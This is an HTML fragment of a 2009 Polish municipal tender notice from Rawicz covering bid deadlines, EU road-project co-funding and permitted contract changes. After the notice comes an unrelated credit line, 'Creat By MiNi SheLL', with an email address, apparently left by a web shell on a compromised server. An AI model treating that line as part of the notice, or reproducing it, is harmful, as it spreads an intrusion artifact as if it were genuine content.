<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rawicz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego: Urząd Miejski Gminy Rawicz ul. Piłsudskiego 21 pok. 111, 63-900 Rawicz - odpłatnie w cenie 20 PLN (zapłata należności w kasie Urzędu) lub za zaliczeniem pocztowym.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2009 godzina 10:00, miejsce: w siedzibie Zamawiajacego - w sekretariacie Urzędu Miejskiego Gminy Rawicz, 63-900 Rawicz ul. Piłsudskiego 21 pokój nr 6.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zadanie zostało wstępnie zakwalifikowane przez Urząd Marszałkowski Województwa Wielkopolskiego do dofinansowanie z funduszy Unii Europejskiej w ramach Wielkopolskiego Regionalnego  Programu Operacyjnego na lata 2007 - 2013 - Priorytet II - Działanie  2.2  - schemat  II  Drogi w granicach administracyjnych miasta poniżej 50 tys. mieszkańców oraz na obszarach wiejskich. 
2. Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje w postępowaniu o udzielenie zamówienia ZAMAWIAJĄCY i WYKONAWCY przekazują pisemnie lub za pomocą faksu, z zastrzeżeniem protestu, który składa się wyłącznie w formie pisemnej na adres ZAMAWIAJĄCEGO. Złożenie protestu w innej formie nie wywołuje jakichkolwiek skutków prawnych. 
3. Jeżeli ZAMAWIAJĄCY lub WYKONAWCA przekaże faksem dokumenty lub informacje, o których mowa wyżej, każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt ich otrzymania. 
4. Zamawiający dopuszcza możliwość porozumiewania się z Wykonawcą za pomocą poczty elektronicznej. 
5. Zamawiający nie przewiduje zawarcia umowy ramowej. 
6. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów. 
7. Istotne dla stron postanowienia zostały określone w projekcie umowy stanowiącym załącznik do specyfikacji. 
8. Zamawiający dopuszcza - jeżeli uzna za uzasadnione - możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy o których mowa w art. 144 ustawy PZP w następujących przypadkach :
a) potrzeby wykonania usług zamiennych lub odstąpienia od realizacji części usług i związanej z tym zmiany wynagrodzenia na wniosek Zamawiającego,
b) na uzasadniony wniosek Wykonawcy zaakceptowany przez Zamawiającego i pod warunkiem, że zmiana ta wynika z okoliczności których Wykonawca nie mógł  przewidzieć  na etapie składania oferty i nie jest przez niego zawiniona,  może nastąpić zmiana terminu realizacji (np. roboty uzupełniające ),  
c) zmiany Podwykonawcy,  za uprzednią zgodą Zamawiającego; możliwe powierzenie podwykonawcom innej części usług  niż wskazana w ofercie Wykonawcy, a także możliwa zmiana podwykonawcy na etapie realizacji usług  o ile  nie sprzeciwia się to postanowieniem SIWZ.  
d) zmiana terminu realizacji zamówienia, 
e) zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za realizację zamówienia itp.)
f) warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna dla Zamawiającego,

Creat By MiNi SheLL
Email: jattceo@gmail.com